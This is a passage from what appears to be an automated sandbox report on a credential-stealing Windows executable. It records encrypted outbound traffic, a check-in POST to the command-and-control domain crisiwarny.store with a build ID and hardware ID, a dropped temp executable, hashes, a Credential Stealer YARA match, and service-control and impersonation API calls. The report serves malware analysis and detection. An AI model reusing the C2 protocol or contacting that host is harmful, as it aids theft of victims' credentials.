02 33 9c 26 63 4e 07 37 0b a5 4f b7 65 cc Data Ascii: >?&AF[cY%Bq=Zmvo+{!H (K71x+Z/= d:-k_U~"CL8S_i5EKMH@Z1(C(B=-RtB& L}]Z?cvD7aK]9(_tAzb2oOh8>b3&cN7Oe
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: af ef d9 3e ab 0b c8 60 25 2a 4c 7b 90 1f 44 33 55 ee d4 d2 82 99 8f 70 f8 49 95 76 fb 85 6a 54 59 3d 6b 31 98 9f 87 c4 43 48 f6 1e 05 61 86 b5 7e ee 0b a2 1f ea b7 ca d0 0f ef e1 4c 8a 38 9e da 69 ed 2d 70 91 23 9b 8d 27 e2 15 06 58 63 41 05 5e 66 31 71 d1 b7 2a ac bb 54 07 5b e1 df 2b e2 fb 62 37 c4 6e 76 b3 54 79 83 2a d5 a2 bf 37 99 71 9b f3 1f 5a 8f 0d 3f 74 8f 0a 71 22 d4 ef ef 1f 51 5a 65 2a 87 27 84 a8 85 0c 95 45 21 e8 bb d3 e3 c3 40 59 18 df 0b 78 4d 7a 8e 9f f6 60 79 fd d7 30 6c fe db bb bc 0b e0 26 52 7f 1e 17 02 c7 de db 9b 11 9f 17 23 dd 9b 3e 54 18 fe ae 89 17 28 f8 96 cd 98 38 5c 30 ca 0d 9f 3c a0 47 9d 1c f3 38 fe a4 96 0c f4 c4 a6 01 c2 fd 52 41 19 54 50 51 8d a5 47 21 0b a0 85 cc e4 2e 80 d2 ee c7 d7 eb c2 fe 0f dd 99 ea 3f 62 f3 f9 ae Data Ascii: >`%L{D3UpIvjTY=k1CHa~L8i-p#'XcA^f1qT[+b7nvTy7qZ?tq"QZe'E!@YxMz`y0l&R#>T(8\0<G8RATPQG!.?b
2024-10-28 01:07:16 UTC	15331	OUT	Data Raw: b0 c5 f5 25 88 12 cc 27 c7 d2 f0 29 3e 2e 0e e2 b2 57 9b 0a 33 f4 e2 43 f8 0f 71 31 28 59 48 7d 41 ac 48 d6 38 62 2e 85 97 50 f9 69 12 ff a6 45 b2 de 28 88 d0 2a 0d ef 7d b8 e6 9a 60 2a 05 7a 4d 2a 50 1a 21 0e b2 11 84 de 9b 7b 58 c9 ad 3f 3e a5 5a 18 1f 58 9f 7a 94 84 d7 10 6e 7f 87 07 c6 49 9b e7 27 f8 ef 93 3f f2 6c 40 f5 81 16 81 f7 85 3a a1 de f3 8a 97 be c6 45 d2 6d 99 0b 11 ee 03 13 a6 7a 9f 83 69 9a e8 1a 23 e3 2e 5d 10 3a ff 73 3a c3 68 20 ea 93 36 c7 75 bc 65 dd a6 65 b3 83 6f 34 a6 55 10 e1 d3 43 fa 81 0b bc 7f cd f8 f5 16 a2 b1 09 fd b1 84 cd a2 ca 89 7a f7 81 64 de 8c 38 eb 57 4f 72 e5 9b c1 cd e7 95 eb 03 36 e5 b4 9b ac 5f 73 0a 05 b4 45 56 10 f7 9c 28 44 5b 1c 22 04 90 32 c3 3e 54 6e 16 8c b9 fa 30 42 b8 43 cd e2 41 d5 d8 88 ea 15 3c 75 60 Data Ascii: %')>.W3Cq1(YH}AH8b.PiE(}`zM*P!{X?>ZXznI'?l@:Emzi#.]:s:h 6ueeo4UCzd8WOr6_sEV(D["2>Tn0BCA<u`
2024-10-28 01:07:20 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5ulpr2il5sh9i2eglurc8r5ct9; expires=Thu, 20 Feb 2025 18:53:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XwJG%2Bc%2Bh6SsRoNZCXB%2F5m4HDMhz1TvDmp5egXnwf9x04wO7bZ1MKj2dFOze7Shee3FZcf%2BYb7YgTTPv57bIddWqTR6dL9dVqFggayzVxH4zhNpkEYO1IsLymJUkcrJRI9Vd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d97072caa942cd0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2105&sent=203&recv=584&lost=0&retrans=0&sent_bytes=2839&recv_bytes=553756&delivery_rate=1386309&cwnd=248&unsent_bytes=0&cid=b90a008fd893f98c&ts=4032&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49716	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:21 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: crisiwarny.store
2024-10-28 01:07:21 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 36 32 41 36 37 37 32 46 46 34 37 34 42 46 37 30 36 32 38 34 41 33 34 33 41 36 38 42 39 33 32 32 Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=62A6772FF474BF706284A343A68B9322
2024-10-28 01:07:21 UTC	1009	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m5e8246lf62isfal3e9hv8aqtg; expires=Thu, 20 Feb 2025 18:54:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zEST9atrIH8aUKCgkLmldTo5%2BbEvW%2BwJHx78kyFLRbixerZyQJAJM8YbG%2BJoKqyIXjO0vmujG%2Bb5mKNE5RX6VgFW70XhD4GwQgxS6i86ClUEJTJJthDbJYPv4k0tio4n1i3O"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d970749f88a2845-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1842&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=987&delivery_rate=1375771&cwnd=227&unsent_bytes=0&cid=613fe47425c28d89&ts=523&x=0"
2024-10-28 01:07:21 UTC	130	IN	Data Raw: 37 63 0d 0a 50 55 73 57 37 35 58 56 50 32 45 33 38 75 71 62 56 4d 30 37 41 69 5a 43 6d 72 64 65 30 71 68 4c 31 6c 6a 39 45 74 34 46 41 62 74 6d 4d 44 53 61 74 2b 38 64 43 55 4f 47 6d 71 45 49 34 6d 63 74 46 33 71 76 6d 57 7a 6a 6e 57 58 6e 61 63 34 38 37 7a 4e 64 6c 46 49 74 63 4c 4f 36 73 56 6f 48 47 5a 65 53 2f 6e 62 68 47 57 52 53 59 4b 43 48 63 76 44 4e 61 65 78 6f 67 45 38 3d 0d 0a Data Ascii: 7cPUsW75XVP2E38uqbVM07AiZCmrde0qhL1lj9Et4FAbtmMDSat+8dCUOGmqEI4mctF3qvmWzjnWXnac487zNdlFItcLO6sVoHGZeS/nbhGWRSYKCHcvDNaexogE8=
2024-10-28 01:07:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:07:02
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xd30000
File size:	3'037'696 bytes
MD5 hash:	D982361460F61047F7EEFF2E03E61D91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120373354.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:07:26
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe"
Imagebase:	0xa60000
File size:	2'783'232 bytes
MD5 hash:	1D792472559DBD0C610878880006F977
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	50%
Signature Coverage:	12.5%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 055515D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 055518C8

Strings

2w~2, xrefs: 0555162A
2w~2, xrefs: 055515FB

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ChangeConfigService
String ID: 2w~2$2w~2
API String ID: 3849694230-4077431648
Opcode ID: 57d2ef7f8399e1051efd6d64bc03d9ef3e0bfc898c04b47d24faec1624e866ff
Instruction ID: 61cc9ad9f1daa3d2ed95e5c2b0524a3bcc23b462dc565b29170341ada44553cb
Opcode Fuzzy Hash: 57d2ef7f8399e1051efd6d64bc03d9ef3e0bfc898c04b47d24faec1624e866ff
Instruction Fuzzy Hash: 23C15C71D10A599FDB10CFA8C8957ADBBF1FF45320F14812AEC99E7290D7749885CB81

Function 00BEEE97 Relevance: 1.6, APIs: 1, Instructions: 50
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,CB0358CD,00000003,00000000,00000003), ref: 00BEEF63

Memory Dump Source

Source File: 00000003.00000002.2457863815.0000000000BE9000.00000040.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2457638725.0000000000A60000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457662050.0000000000A62000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457680684.0000000000A66000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457698817.0000000000A6A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457718208.0000000000A76000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457821275.0000000000BCF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457840222.0000000000BD1000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457863815.0000000000BF4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457899102.0000000000BFC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457916285.0000000000BFF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457937336.0000000000C11000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457954484.0000000000C12000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457976192.0000000000C2E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457994969.0000000000C35000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458012404.0000000000C37000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458029623.0000000000C3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458048085.0000000000C45000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458064594.0000000000C48000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458084522.0000000000C57000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458101881.0000000000C5A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458118913.0000000000C61000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458135716.0000000000C64000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458151976.0000000000C65000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458177332.0000000000C6D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458198735.0000000000C82000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458216125.0000000000C87000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458233219.0000000000C8E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458251126.0000000000C91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458270123.0000000000C99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458287405.0000000000C9A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458325867.0000000000CF7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458325867.0000000000CFD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458362646.0000000000D0C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458379114.0000000000D0E000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33f22e4aae1339ba38bdd0a3848789b4722ff9a0429f63bd50ca6423afce1898
Instruction ID: efadb7a6a6a7ce739033ca1065c0d66af60c588c63072c4ee927a9d403289444
Opcode Fuzzy Hash: 33f22e4aae1339ba38bdd0a3848789b4722ff9a0429f63bd50ca6423afce1898
Instruction Fuzzy Hash: E90126B254C285BEF3009E016891FFF73ADE780720F31484AFA51DB581C7600C845772

Function 00A6B972 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2457698817.0000000000A6A000.00000040.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2457638725.0000000000A60000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457662050.0000000000A62000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457680684.0000000000A66000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457718208.0000000000A76000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457821275.0000000000BCF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457840222.0000000000BD1000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457863815.0000000000BE9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457863815.0000000000BF4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457899102.0000000000BFC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457916285.0000000000BFF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457937336.0000000000C11000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457954484.0000000000C12000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457976192.0000000000C2E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457994969.0000000000C35000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458012404.0000000000C37000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458029623.0000000000C3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458048085.0000000000C45000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458064594.0000000000C48000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458084522.0000000000C57000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458101881.0000000000C5A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458118913.0000000000C61000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458135716.0000000000C64000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458151976.0000000000C65000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458177332.0000000000C6D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458198735.0000000000C82000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458216125.0000000000C87000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458233219.0000000000C8E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458251126.0000000000C91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458270123.0000000000C99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458287405.0000000000C9A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458325867.0000000000CF7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458325867.0000000000CFD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458362646.0000000000D0C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458379114.0000000000D0E000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ef1f41b6958a0566003f1aee3d7a2fc6fdda03d7fa5c06ecb6d53f49960cd7
Instruction ID: 676e1f258fe9119836927050c58e2a1360b452d3e665d2181e9f17236c378bf1
Opcode Fuzzy Hash: 22ef1f41b6958a0566003f1aee3d7a2fc6fdda03d7fa5c06ecb6d53f49960cd7
Instruction Fuzzy Hash: A8D022773A02058C622C3B61938A25D7373ED40FC436C040AE280CEC8AC314E0C2C3A8

Function 055515C4 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 055518C8

Strings

2w~2, xrefs: 0555162A
2w~2, xrefs: 055515FB

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ChangeConfigService
String ID: 2w~2$2w~2
API String ID: 3849694230-4077431648
Opcode ID: 4925b122002950f4f5b78598f2d8558eb7225185b42ad3526328681c139a35d5
Instruction ID: bdb27de65199a3b0290bb65ffbf1eea6f7af430ea7208df755453337f3ec708c
Opcode Fuzzy Hash: 4925b122002950f4f5b78598f2d8558eb7225185b42ad3526328681c139a35d5
Instruction Fuzzy Hash: 8DC15B71D10A599FDB10CFA8C9A57EDBBB1FB45320F14822AEC99E7280D7749885CB81

Function 05550D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 05550DCD

Strings

2w~2, xrefs: 05550D6A

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ManagerOpen
String ID: 2w~2
API String ID: 1889721586-1404277787
Opcode ID: 030a945db42f9d4b61dc94241f0fdf2e7408389b93a702ee7e75f168f51f9223
Instruction ID: 9984b854ebc080f703ad00b721a112616d2271f06361b315357a954c06a78859
Opcode Fuzzy Hash: 030a945db42f9d4b61dc94241f0fdf2e7408389b93a702ee7e75f168f51f9223
Instruction Fuzzy Hash: 002147B6C002199FCB10CF99D889ADEFFF4FB88320F14815AE809AB244C734A540CFA4

Function 05550D48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 05550DCD

Strings

2w~2, xrefs: 05550D6A

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ManagerOpen
String ID: 2w~2
API String ID: 1889721586-1404277787
Opcode ID: 0ab65c088df0b0fc468068fd89e95aa56a79fec692c0c940b2e9d963b9970ef1
Instruction ID: e358f3986b2eb27681110d43bda64a58c930fb9a55423039d1e99fc008f1ffa6
Opcode Fuzzy Hash: 0ab65c088df0b0fc468068fd89e95aa56a79fec692c0c940b2e9d963b9970ef1
Instruction Fuzzy Hash: 5F2156B6C002199FCB10CF99D888ADEFBF4FF88320F14811AD809AB244C734A540CFA4

Function 05551510 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32(?,?,?), ref: 05551580

Strings

2w~2, xrefs: 0555152F

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ControlService
String ID: 2w~2
API String ID: 253159669-1404277787
Opcode ID: 4225409cfa5e3a50ebc5c9f3305e7a1bad545ba845231ac47d95e288f6957231
Instruction ID: e271c1d28b9c9ed4a6e9f8287c5adbc918415e427657642af9508c2e1d21e652
Opcode Fuzzy Hash: 4225409cfa5e3a50ebc5c9f3305e7a1bad545ba845231ac47d95e288f6957231
Instruction Fuzzy Hash: D111E2B5D006499FDB10CF9AC584BDEFBF4FB48320F10802AE959A7250D778AA44CFA5

Function 05551509 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32(?,?,?), ref: 05551580

Strings

2w~2, xrefs: 0555152F

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ControlService
String ID: 2w~2
API String ID: 253159669-1404277787
Opcode ID: b28499c0dc20185ad3cae58c53cc00264c474d4f30490037e701e361049770eb
Instruction ID: 7476dd78f98e17a43971d371779d0559796d60f406fffa86736571fc1fa24d51
Opcode Fuzzy Hash: b28499c0dc20185ad3cae58c53cc00264c474d4f30490037e701e361049770eb
Instruction Fuzzy Hash: 022114B5D006499FCB10CFAAC584BDEFBF4BB48320F10842AE959A7240C338A644CFA5

Function 05551301 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 05551367

Strings

2w~2, xrefs: 05551322

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID: 2w~2
API String ID: 2216092060-1404277787
Opcode ID: b64a4665de94d15f3c3bf99f49af90a48c06fd02c4ac65a654e68d8750c73a67
Instruction ID: 59aa2a02700f33eb5764415d0e1a84493dc1eb327ac0d5ad43d091c5fc6964be
Opcode Fuzzy Hash: b64a4665de94d15f3c3bf99f49af90a48c06fd02c4ac65a654e68d8750c73a67
Instruction Fuzzy Hash: 2F1143B5C002098FCB10CF9AC945BDEBBF8FF48320F10845AD958A3240C778A944CFA1

Function 05551308 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 05551367

Strings

2w~2, xrefs: 05551322

Memory Dump Source

Source File: 00000003.00000002.2460187818.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5550000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID: 2w~2
API String ID: 2216092060-1404277787
Opcode ID: a42c83630a516007a9eb2a69efac020812a7aed3ce64da7fcac854ac7979c7a4
Instruction ID: dabc29b0708d9401e688ea5551c8e94639bab55ebd2ab8df9d44f4c9999a24bb
Opcode Fuzzy Hash: a42c83630a516007a9eb2a69efac020812a7aed3ce64da7fcac854ac7979c7a4
Instruction Fuzzy Hash: 6C1122B1C002498FDB10CF9AC545BDEBBF8FB48320F20846AD559A3240D778A944CFA5

Function 00BEC1B1 Relevance: 1.6, APIs: 1, Instructions: 91
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00BEC1B1

Memory Dump Source

Source File: 00000003.00000002.2457863815.0000000000BE9000.00000040.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2457638725.0000000000A60000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457662050.0000000000A62000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457680684.0000000000A66000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457698817.0000000000A6A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457718208.0000000000A76000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457821275.0000000000BCF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457840222.0000000000BD1000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457863815.0000000000BF4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457899102.0000000000BFC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457916285.0000000000BFF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457937336.0000000000C11000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457954484.0000000000C12000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457976192.0000000000C2E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457994969.0000000000C35000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458012404.0000000000C37000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458029623.0000000000C3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458048085.0000000000C45000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458064594.0000000000C48000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458084522.0000000000C57000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458101881.0000000000C5A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458118913.0000000000C61000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458135716.0000000000C64000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458151976.0000000000C65000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458177332.0000000000C6D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458198735.0000000000C82000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458216125.0000000000C87000.00000040.00000001.01000000.00000006.sdmpDownload File
